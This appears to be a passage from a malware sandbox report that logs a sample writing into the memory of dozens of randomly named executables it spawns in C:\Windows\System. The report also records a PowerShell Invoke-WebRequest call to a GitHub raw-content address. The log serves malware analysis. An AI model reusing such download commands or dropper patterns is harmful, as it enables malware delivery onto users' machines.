PID 232 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\AzOQmgs.exe
PID 232 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\AzOQmgs.exe
PID 232 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\TJfFtMj.exe
PID 232 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\TJfFtMj.exe
PID 232 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\cpNYghl.exe
PID 232 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\cpNYghl.exe
PID 232 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\SYjvtPG.exe
PID 232 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\SYjvtPG.exe
PID 232 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\FlVLSxL.exe
PID 232 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\FlVLSxL.exe
PID 232 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\XobMwfm.exe
PID 232 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\XobMwfm.exe
PID 232 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\knsVvIu.exe
PID 232 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\knsVvIu.exe
PID 232 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\lgTwpcz.exe
PID 232 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\lgTwpcz.exe
PID 232 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\ClhmUqz.exe
PID 232 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\ClhmUqz.exe
PID 232 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\VABdwRq.exe
PID 232 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\VABdwRq.exe
PID 232 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\vcFJdUl.exe
PID 232 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\vcFJdUl.exe
PID 232 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\vpMMLHE.exe
PID 232 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\vpMMLHE.exe
PID 232 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\QpTWwwq.exe
PID 232 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\QpTWwwq.exe
PID 232 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\Nprthpy.exe
PID 232 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\Nprthpy.exe
PID 232 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\piYVlmM.exe
PID 232 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\piYVlmM.exe
PID 232 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\gXVGHRh.exe
PID 232 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\gXVGHRh.exe
PID 232 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\TgwGrDZ.exe
PID 232 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\TgwGrDZ.exe
PID 232 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\hjYTENp.exe
PID 232 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\hjYTENp.exe
PID 232 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\oTwHqia.exe
PID 232 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\oTwHqia.exe
PID 232 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\iSurYzs.exe
PID 232 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\iSurYzs.exe

Processes

C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\LUAXcRm.exe

C:\Windows\System\LUAXcRm.exe

C:\Windows\System\QtGrMoj.exe

C:\Windows\System\QtGrMoj.exe

C:\Windows\System\mbUlHsm.exe

C:\Windows\System\mbUlHsm.exe

C:\Windows\System\AzGRyMj.exe

C:\Windows\System\AzGRyMj.exe

C:\Windows\System\WtDYSuY.exe

C:\Windows\System\WtDYSuY.exe

C:\Windows\System\HxbAazS.exe

C:\Windows\System\HxbAazS.exe

C:\Windows\System\RHanOlc.exe

C:\Windows\System\RHanOlc.exe

C:\Windows\System\UxUdIos.exe

C:\Windows\System\UxUdIos.exe

C:\Windows\System\datiduA.exe

C:\Windows\System\datiduA.exe

C:\Windows\System\VNqvexl.exe

C:\Windows\System\VNqvexl.exe

C:\Windows\System\TyJwUgx.exe

C:\Windows\System\TyJwUgx.exe

C:\Windows\System\AzOQmgs.exe

C:\Windows\System\AzOQmgs.exe

C:\Windows\System\TJfFtMj.exe

C:\Windows\System\TJfFtMj.exe

C:\Windows\System\cpNYghl.exe

C:\Windows\System\cpNYghl.exe

C:\Windows\System\SYjvtPG.exe

C:\Windows\System\SYjvtPG.exe

C:\Windows\System\FlVLSxL.exe

C:\Windows\System\FlVLSxL.exe

C:\Windows\System\XobMwfm.exe

C:\Windows\System\XobMwfm.exe

C:\Windows\System\knsVvIu.exe

C:\Windows\System\knsVvIu.exe

C:\Windows\System\lgTwpcz.exe

C:\Windows\System\lgTwpcz.exe

C:\Windows\System\ClhmUqz.exe

C:\Windows\System\ClhmUqz.exe

C:\Windows\System\VABdwRq.exe

C:\Windows\System\VABdwRq.exe

C:\Windows\System\vcFJdUl.exe

C:\Windows\System\vcFJdUl.exe

C:\Windows\System\vpMMLHE.exe

C:\Windows\System\vpMMLHE.exe

C:\Windows\System\QpTWwwq.exe

C:\Windows\System\QpTWwwq.exe

C:\Windows\System\Nprthpy.exe

C:\Windows\System\Nprthpy.exe

C:\Windows\System\piYVlmM.exe

C:\Windows\System\piYVlmM.exe

C:\Windows\System\gXVGHRh.exe

C:\Windows\System\gXVGHRh.exe

C:\Windows\System\TgwGrDZ.exe

C:\Windows\System\TgwGrDZ.exe

C:\Windows\System\hjYTENp.exe

C:\Windows\System\hjYTENp.exe

C:\Windows\System\oTwHqia.exe

C:\Windows\System\oTwHqia.exe

C:\Windows\System\iSurYzs.exe

C:\Windows\System\iSurYzs.exe

C:\Windows\System\wxaSHlM.exe

C:\Windows\System\wxaSHlM.exe

C:\Windows\System\Xrmhxyc.exe

C:\Windows\System\Xrmhxyc.exe

C:\Windows\System\VsPNFKy.exe

C:\Windows\System\VsPNFKy.exe

C:\Windows\System\XXmpKFE.exe

C:\Windows\System\XXmpKFE.exe

C:\Windows\System\rLvaKqj.exe

C:\Windows\System\rLvaKqj.exe

C:\Windows\System\vJCaAFG.exe

C:\Windows\System\vJCaAFG.exe

C:\Windows\System\vFWAEqY.exe

C:\Windows\System\vFWAEqY.exe

C:\Windows\System\qKTUGfh.exe

C:\Windows\System\qKTUGfh.exe

C:\Windows\System\XfWthaf.exe

C:\Windows\System\XfWthaf.exe

C:\Windows\System\uqRtqjc.exe

C:\Windows\System\uqRtqjc.exe

C:\Windows\System\aZoorGw.exe

C:\Windows\System\aZoorGw.exe

C:\Windows\System\aLtFGUb.exe

C:\Windows\System\aLtFGUb.exe

C:\Windows\System\inbnQcy.exe

C:\Windows\System\inbnQcy.exe

C:\Windows\System\pHTpoGc.exe

C:\Windows\System\pHTpoGc.exe

C:\Windows\System\BgqktBJ.exe

C:\Windows\System\BgqktBJ.exe

C:\Windows\System\WlBAjHP.exe

C:\Windows\System\WlBAjHP.exe

C:\Windows\System\MAfBHCv.exe

C:\Windows\System\MAfBHCv.exe

C:\Windows\System\EhNEHug.exe

C:\Windows\System\EhNEHug.exe

C:\Windows\System\GhMLHhA.exe

C:\Windows\System\GhMLHhA.exe

C:\Windows\System\NAFaJyo.exe

C:\Windows\System\NAFaJyo.exe

C:\Windows\System\yAQGjZX.exe

C:\Windows\System\yAQGjZX.exe

C:\Windows\System\KVbtNZr.exe

C:\Windows\System\KVbtNZr.exe

C:\Windows\System\QLxbZJT.exe

C:\Windows\System\QLxbZJT.exe

C:\Windows\System\dBbBZuE.exe

C:\Windows\System\dBbBZuE.exe

C:\Windows\System\NSCzAwV.exe

C:\Windows\System\NSCzAwV.exe

C:\Windows\System\ekueOOg.exe

C:\Windows\System\ekueOOg.exe

C:\Windows\System\NpwjHvs.exe

C:\Windows\System\NpwjHvs.exe

C:\Windows\System\sXMXTsE.exe

C:\Windows\System\sXMXTsE.exe

C:\Windows\System\lPbkaxK.exe

C:\Windows\System\lPbkaxK.exe

C:\Windows\System\MHgHPTZ.exe

C:\Windows\System\MHgHPTZ.exe

C:\Windows\System\KPODZYe.exe

C:\Windows\System\KPODZYe.exe

C:\Windows\System\fuMqsDo.exe

C:\Windows\System\fuMqsDo.exe

C:\Windows\System\IYIeqqr.exe

C:\Windows\System\IYIeqqr.exe

C:\Windows\System\ShSvvBD.exe

C:\Windows\System\ShSvvBD.exe

C:\Windows\System\ihDRVzo.exe

C:\Windows\System\ihDRVzo.exe

C:\Windows\System\hJhnQiw.exe

C:\Windows\System\hJhnQiw.exe

C:\Windows\System\XkzvGjE.exe

C:\Windows\System\XkzvGjE.exe

C:\Windows\System\yHgmsfr.exe

C:\Windows\System\yHgmsfr.exe

C:\Windows\System\pkEOqbT.exe

C:\Windows\System\pkEOqbT.exe

C:\Windows\System\hGOemCZ.exe

C:\Windows\System\hGOemCZ.exe

C:\Windows\System\xZoSqkY.exe

C:\Windows\System\xZoSqkY.exe

C:\Windows\System\HtIexUe.exe

C:\Windows\System\HtIexUe.exe

C:\Windows\System\gYPApHi.exe

C:\Windows\System\gYPApHi.exe

C:\Windows\System\JFFGyin.exe

C:\Windows\System\JFFGyin.exe

C:\Windows\System\ezEPqYE.exe

C:\Windows\System\ezEPqYE.exe

C:\Windows\System\evkCXrV.exe

C:\Windows\System\evkCXrV.exe

C:\Windows\System\UuqOIJm.exe

C:\Windows\System\UuqOIJm.exe

C:\Windows\System\vrHMslK.exe

C:\Windows\System\vrHMslK.exe

C:\Windows\System\wjjpEzo.exe

C:\Windows\System\wjjpEzo.exe

C:\Windows\System\lzsupWB.exe

C:\Windows\System\lzsupWB.exe

C:\Windows\System\TLiZYnn.exe

C:\Windows\System\TLiZYnn.exe

C:\Windows\System\HwvrhAn.exe

C:\Windows\System\HwvrhAn.exe

C:\Windows\System\aTXgcYz.exe

C:\Windows\System\aTXgcYz.exe

C:\Windows\System\ZJPptUk.exe

C:\Windows\System\ZJPptUk.exe

C:\Windows\System\oOVBnnQ.exe

C:\Windows\System\oOVBnnQ.exe

C:\Windows\System\nQNxiZr.exe

C:\Windows\System\nQNxiZr.exe

C:\Windows\System\ehWRyob.exe

C:\Windows\System\ehWRyob.exe

C:\Windows\System\TMnsrMm.exe

C:\Windows\System\TMnsrMm.exe

C:\Windows\System\dBtBstO.exe

C:\Windows\System\dBtBstO.exe

C:\Windows\System\iOkrvgz.exe

C:\Windows\System\iOkrvgz.exe

C:\Windows\System\JpelOXM.exe

C:\Windows\System\JpelOXM.exe

C:\Windows\System\WvGvHNK.exe

C:\Windows\System\WvGvHNK.exe

C:\Windows\System\oDybcnu.exe

C:\Windows\System\oDybcnu.exe

C:\Windows\System\uMJOkBJ.exe

C:\Windows\System\uMJOkBJ.exe

C:\Windows\System\sxWuYCE.exe

C:\Windows\System\sxWuYCE.exe

C:\Windows\System\bYYzuvf.exe

C:\Windows\System\bYYzuvf.exe

C:\Windows\System\PRJLUft.exe

C:\Windows\System\PRJLUft.exe

C:\Windows\System\nqgPmxw.exe

C:\Windows\System\nqgPmxw.exe

C:\Windows\System\irJiLPJ.exe

C:\Windows\System\irJiLPJ.exe

C:\Windows\System\SaHSSum.exe

C:\Windows\System\SaHSSum.exe

C:\Windows\System\NxAxxCv.exe

C:\Windows\System\NxAxxCv.exe

C:\Windows\System\szxjKrp.exe

C:\Windows\System\szxjKrp.exe

C:\Windows\System\lIUtFve.exe

C:\Windows\System\lIUtFve.exe

C:\Windows\System\bqPedcZ.exe

C:\Windows\System\bqPedcZ.exe

C:\Windows\System\jvxyKsB.exe

C:\Windows\System\jvxyKsB.exe

C:\Windows\System\ksNEBCV.exe

C:\Windows\System\ksNEBCV.exe

C:\Windows\System\utrnsGi.exe

C:\Windows\System\utrnsGi.exe

C:\Windows\System\tlJhZww.exe

C:\Windows\System\tlJhZww.exe

C:\Windows\System\XfKxoJm.exe

C:\Windows\System\XfKxoJm.exe

C:\Windows\System\TEZTHiD.exe

C:\Windows\System\TEZTHiD.exe

C:\Windows\System\FhBIovt.exe

C:\Windows\System\FhBIovt.exe

C:\Windows\System\udrUiyo.exe

C:\Windows\System\udrUiyo.exe

C:\Windows\System\KCUvWCk.exe

C:\Windows\System\KCUvWCk.exe

C:\Windows\System\sFDEivf.exe

C:\Windows\System\sFDEivf.exe

C:\Windows\System\yiDawrh.exe

C:\Windows\System\yiDawrh.exe

C:\Windows\System\GEpyCQS.exe

C:\Windows\System\GEpyCQS.exe

C:\Windows\System\BNiWApE.exe

C:\Windows\System\BNiWApE.exe

C:\Windows\System\juqAfvj.exe

C:\Windows\System\juqAfvj.exe

C:\Windows\System\gCyxsmY.exe

C:\Windows\System\gCyxsmY.exe

C:\Windows\System\uFEOQbg.exe

C:\Windows\System\uFEOQbg.exe

C:\Windows\System\hrIEbmf.exe

C:\Windows\System\hrIEbmf.exe

C:\Windows\System\UlSirbn.exe

C:\Windows\System\UlSirbn.exe

C:\Windows\System\ANoYAQp.exe

C:\Windows\System\ANoYAQp.exe

C:\Windows\System\GMYSfYd.exe

C:\Windows\System\GMYSfYd.exe

C:\Windows\System\UBWsLYS.exe

C:\Windows\System\UBWsLYS.exe

C:\Windows\System\XDYrlNr.exe

C:\Windows\System\XDYrlNr.exe

C:\Windows\System\OjjXjzY.exe

C:\Windows\System\OjjXjzY.exe

C:\Windows\System\RlJIJfj.exe

C:\Windows\System\RlJIJfj.exe

C:\Windows\System\dAsaCWq.exe

C:\Windows\System\dAsaCWq.exe

C:\Windows\System\dmYMmsg.exe

C:\Windows\System\dmYMmsg.exe

C:\Windows\System\SQJCRJH.exe

C:\Windows\System\SQJCRJH.exe

C:\Windows\System\pfxfafz.exe

C:\Windows\System\pfxfafz.exe

C:\Windows\System\PnuVRLs.exe

C:\Windows\System\PnuVRLs.exe

C:\Windows\System\tEbhNFs.exe

C:\Windows\System\tEbhNFs.exe

C:\Windows\System\HOTdkDV.exe

C:\Windows\System\HOTdkDV.exe

C:\Windows\System\KzJfvIT.exe

C:\Windows\System\KzJfvIT.exe

C:\Windows\System\AhAbrhw.exe

C:\Windows\System\AhAbrhw.exe

C:\Windows\System\ytETtsV.exe

C:\Windows\System\ytETtsV.exe

C:\Windows\System\LsrHRZM.exe

C:\Windows\System\LsrHRZM.exe

C:\Windows\System\YOAhxHX.exe

C:\Windows\System\YOAhxHX.exe

C:\Windows\System\RaVbygH.exe

C:\Windows\System\RaVbygH.exe

C:\Windows\System\MJTdRAk.exe

C:\Windows\System\MJTdRAk.exe

C:\Windows\System\hyVCBUL.exe

C:\Windows\System\hyVCBUL.exe

C:\Windows\System\sriugnX.exe

C:\Windows\System\sriugnX.exe

C:\Windows\System\klcBxyq.exe

C:\Windows\System\klcBxyq.exe

C:\Windows\System\HyixIIp.exe

C:\Windows\System\HyixIIp.exe

C:\Windows\System\mMvEKmW.exe

C:\Windows\System\mMvEKmW.exe

C:\Windows\System\oHFjObQ.exe

C:\Windows\System\oHFjObQ.exe

C:\Windows\System\hcPKzjX.exe

C:\Windows\System\hcPKzjX.exe

C:\Windows\System\bWSsHAZ.exe

C:\Windows\System\bWSsHAZ.exe

C:\Windows\System\LxfLUjg.exe

C:\Windows\System\LxfLUjg.exe

C:\Windows\System\eLwcIge.exe

C:\Windows\System\eLwcIge.exe

C:\Windows\System\AbQwgkS.exe

C:\Windows\System\AbQwgkS.exe

C:\Windows\System\dDWrTbT.exe

C:\Windows\System\dDWrTbT.exe

C:\Windows\System\LZVEXMz.exe

C:\Windows\System\LZVEXMz.exe

C:\Windows\System\hKwRFAV.exe

C:\Windows\System\hKwRFAV.exe

C:\Windows\System\RYhopWS.exe

C:\Windows\System\RYhopWS.exe

C:\Windows\System\nttJLfd.exe

C:\Windows\System\nttJLfd.exe

C:\Windows\System\hbAtIWu.exe

C:\Windows\System\hbAtIWu.exe

C:\Windows\System\WoIbBlY.exe

C:\Windows\System\WoIbBlY.exe

C:\Windows\System\cVvrXUK.exe

C:\Windows\System\cVvrXUK.exe

C:\Windows\System\gMEPJJa.exe

C:\Windows\System\gMEPJJa.exe

C:\Windows\System\tHzQPFK.exe

C:\Windows\System\tHzQPFK.exe

C:\Windows\System\nxjYAmP.exe

C:\Windows\System\nxjYAmP.exe

C:\Windows\System\zUXaJoa.exe

C:\Windows\System\zUXaJoa.exe

C:\Windows\System\KXtPPtw.exe

C:\Windows\System\KXtPPtw.exe

C:\Windows\System\cWBQdci.exe

C:\Windows\System\cWBQdci.exe

C:\Windows\System\gbGrHzK.exe

C:\Windows\System\gbGrHzK.exe

C:\Windows\System\myBGlqQ.exe

C:\Windows\System\myBGlqQ.exe

C:\Windows\System\QQIWQoU.exe

C:\Windows\System\QQIWQoU.exe

C:\Windows\System\uzJgyeV.exe

C:\Windows\System\uzJgyeV.exe

C:\Windows\System\bFbgJJh.exe

C:\Windows\System\bFbgJJh.exe

C:\Windows\System\ipfvOSi.exe

C:\Windows\System\ipfvOSi.exe

C:\Windows\System\ZvWmNKH.exe

C:\Windows\System\ZvWmNKH.exe

C:\Windows\System\dvKialA.exe

C:\Windows\System\dvKialA.exe

C:\Windows\System\hwSSyYE.exe

C:\Windows\System\hwSSyYE.exe

C:\Windows\System\pxYOJzN.exe

C:\Windows\System\pxYOJzN.exe

C:\Windows\System\FsLZEpn.exe

C:\Windows\System\FsLZEpn.exe

C:\Windows\System\qvnkvuy.exe

C:\Windows\System\qvnkvuy.exe

C:\Windows\System\YNaKXHe.exe

C:\Windows\System\YNaKXHe.exe

C:\Windows\System\OHwdVaw.exe

C:\Windows\System\OHwdVaw.exe

C:\Windows\System\Jaiajll.exe

C:\Windows\System\Jaiajll.exe

C:\Windows\System\WbJKYvQ.exe

C:\Windows\System\WbJKYvQ.exe

C:\Windows\System\rCImgOX.exe

C:\Windows\System\rCImgOX.exe

C:\Windows\System\HrUcrEz.exe

C:\Windows\System\HrUcrEz.exe

C:\Windows\System\fcAbTOX.exe

C:\Windows\System\fcAbTOX.exe

C:\Windows\System\oHuzAMe.exe

C:\Windows\System\oHuzAMe.exe

C:\Windows\System\SrPTsxC.exe

C:\Windows\System\SrPTsxC.exe

C:\Windows\System\ufktTdR.exe

C:\Windows\System\ufktTdR.exe

C:\Windows\System\YhIhBMA.exe

C:\Windows\System\YhIhBMA.exe

C:\Windows\System\LwNTnnD.exe

C:\Windows\System\LwNTnnD.exe

C:\Windows\System\lxZateG.exe

C:\Windows\System\lxZateG.exe

C:\Windows\System\jsXqTVq.exe

C:\Windows\System\jsXqTVq.exe

C:\Windows\System\kcmEMNQ.exe

C:\Windows\System\kcmEMNQ.exe

C:\Windows\System\pcUiSQJ.exe

C:\Windows\System\pcUiSQJ.exe

C:\Windows\System\tVFCsPo.exe

C:\Windows\System\tVFCsPo.exe

C:\Windows\System\RaWsKSw.exe

C:\Windows\System\RaWsKSw.exe

C:\Windows\System\RuBFJuf.exe

C:\Windows\System\RuBFJuf.exe

C:\Windows\System\QlyfKev.exe

C:\Windows\System\QlyfKev.exe

C:\Windows\System\otakcRW.exe

C:\Windows\System\otakcRW.exe

C:\Windows\System\arwoGCU.exe

C:\Windows\System\arwoGCU.exe

C:\Windows\System\FvXqkuZ.exe

C:\Windows\System\FvXqkuZ.exe

C:\Windows\System\tXMwGES.exe

C:\Windows\System\tXMwGES.exe

C:\Windows\System\TODXYCf.exe

C:\Windows\System\TODXYCf.exe

C:\Windows\System\hWVijQy.exe

C:\Windows\System\hWVijQy.exe

C:\Windows\System\pgZncBl.exe

C:\Windows\System\pgZncBl.exe

C:\Windows\System\jHFRaBG.exe

C:\Windows\System\jHFRaBG.exe

C:\Windows\System\OKepGRc.exe

C:\Windows\System\OKepGRc.exe

C:\Windows\System\klWjytt.exe

C:\Windows\System\klWjytt.exe

C:\Windows\System\RWstcHj.exe

C:\Windows\System\RWstcHj.exe

C:\Windows\System\KZvTqXc.exe

C:\Windows\System\KZvTqXc.exe

C:\Windows\System\hLlsXKE.exe

C:\Windows\System\hLlsXKE.exe

C:\Windows\System\zyucCht.exe

C:\Windows\System\zyucCht.exe

C:\Windows\System\nAQfqlb.exe

C:\Windows\System\nAQfqlb.exe

C:\Windows\System\VEfImij.exe

C:\Windows\System\VEfImij.exe

C:\Windows\System\hhOorSg.exe

C:\Windows\System\hhOorSg.exe

C:\Windows\System\RNvhDuO.exe

C:\Windows\System\RNvhDuO.exe

C:\Windows\System\WVLabNo.exe

C:\Windows\System\WVLabNo.exe

C:\Windows\System\tJOATgQ.exe

C:\Windows\System\tJOATgQ.exe

C:\Windows\System\VuslsDZ.exe

C:\Windows\System\VuslsDZ.exe

C:\Windows\System\FPhGwCQ.exe

C:\Windows\System\FPhGwCQ.exe

C:\Windows\System\fmtpksg.exe

C:\Windows\System\fmtpksg.exe

C:\Windows\System\kWBGYyB.exe

C:\Windows\System\kWBGYyB.exe

C:\Windows\System\iIpqdRZ.exe

C:\Windows\System\iIpqdRZ.exe

C:\Windows\System\LqgGeRs.exe

C:\Windows\System\LqgGeRs.exe

C:\Windows\System\UfciZwF.exe

C:\Windows\System\UfciZwF.exe

C:\Windows\System\sHDhJty.exe

C:\Windows\System\sHDhJty.exe

C:\Windows\System\WxOlPNE.exe

C:\Windows\System\WxOlPNE.exe

C:\Windows\System\dSbsnPP.exe

C:\Windows\System\dSbsnPP.exe

C:\Windows\System\NTOjXsy.exe

C:\Windows\System\NTOjXsy.exe

C:\Windows\System\SWNRNFX.exe

C:\Windows\System\SWNRNFX.exe

C:\Windows\System\gXakaDd.exe

C:\Windows\System\gXakaDd.exe

C:\Windows\System\AMhtPPQ.exe

C:\Windows\System\AMhtPPQ.exe

C:\Windows\System\agSaDOI.exe

C:\Windows\System\agSaDOI.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3748,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3960 /prefetch:8

C:\Windows\System\GVIlewz.exe

C:\Windows\System\GVIlewz.exe

C:\Windows\System\LaLJWWs.exe

C:\Windows\System\LaLJWWs.exe

C:\Windows\System\onaqlNl.exe

C:\Windows\System\onaqlNl.exe

C:\Windows\System\yNEzxIy.exe

C:\Windows\System\yNEzxIy.exe

C:\Windows\System\nLSfTSV.exe

C:\Windows\System\nLSfTSV.exe

C:\Windows\System\UryAYry.exe

C:\Windows\System\UryAYry.exe

C:\Windows\System\pBKEwHn.exe

C:\Windows\System\pBKEwHn.exe

C:\Windows\System\MQjMqCY.exe

C:\Windows\System\MQjMqCY.exe

C:\Windows\System\ekgOYQt.exe

C:\Windows\System\ekgOYQt.exe

C:\Windows\System\QoSdchP.exe

C:\Windows\System\QoSdchP.exe

C:\Windows\System\PYDRJcE.exe

C:\Windows\System\PYDRJcE.exe

C:\Windows\System\zqDmaBG.exe

C:\Windows\System\zqDmaBG.exe

C:\Windows\System\pCiucEt.exe

C:\Windows\System\pCiucEt.exe

C:\Windows\System\kOwvWLF.exe

C:\Windows\System\kOwvWLF.exe

C:\Windows\System\vtqnGac.exe

C:\Windows\System\vtqnGac.exe

C:\Windows\System\nulAXcJ.exe

C:\Windows\System\nulAXcJ.exe

C:\Windows\System\EhhQzPD.exe

C:\Windows\System\EhhQzPD.exe

C:\Windows\System\AUtLAqV.exe

C:\Windows\System\AUtLAqV.exe

C:\Windows\System\VlGbdIP.exe

C:\Windows\System\VlGbdIP.exe

C:\Windows\System\YuxzjSt.exe

C:\Windows\System\YuxzjSt.exe

C:\Windows\System\ROaNMfW.exe

C:\Windows\System\ROaNMfW.exe

C:\Windows\System\MhHUPnh.exe

C:\Windows\System\MhHUPnh.exe

C:\Windows\System\batYonu.exe

C:\Windows\System\batYonu.exe

C:\Windows\System\ZgbeFGd.exe

C:\Windows\System\ZgbeFGd.exe

C:\Windows\System\ZABGZEL.exe

C:\Windows\System\ZABGZEL.exe

C:\Windows\System\vIcEPSj.exe

C:\Windows\System\vIcEPSj.exe

C:\Windows\System\cseBxGf.exe

C:\Windows\System\cseBxGf.exe

C:\Windows\System\FUcKIsF.exe

C:\Windows\System\FUcKIsF.exe

C:\Windows\System\fuMTlFH.exe

C:\Windows\System\fuMTlFH.exe

C:\Windows\System\HPFWqhd.exe

C:\Windows\System\HPFWqhd.exe

C:\Windows\System\rQHEtDo.exe

C:\Windows\System\rQHEtDo.exe

C:\Windows\System\qnMsbrK.exe

C:\Windows\System\qnMsbrK.exe

C:\Windows\System\jrpWVZU.exe

C:\Windows\System\jrpWVZU.exe

C:\Windows\System\UcRMyMM.exe

C:\Windows\System\UcRMyMM.exe

C:\Windows\System\KGyQeFB.exe

C:\Windows\System\KGyQeFB.exe

C:\Windows\System\HmPJFEO.exe

C:\Windows\System\HmPJFEO.exe

C:\Windows\System\oCNPMuL.exe

C:\Windows\System\oCNPMuL.exe

C:\Windows\System\VofKlRU.exe

C:\Windows\System\VofKlRU.exe

C:\Windows\System\dWGYznq.exe

C:\Windows\System\dWGYznq.exe

C:\Windows\System\yfxEMOX.exe

C:\Windows\System\yfxEMOX.exe

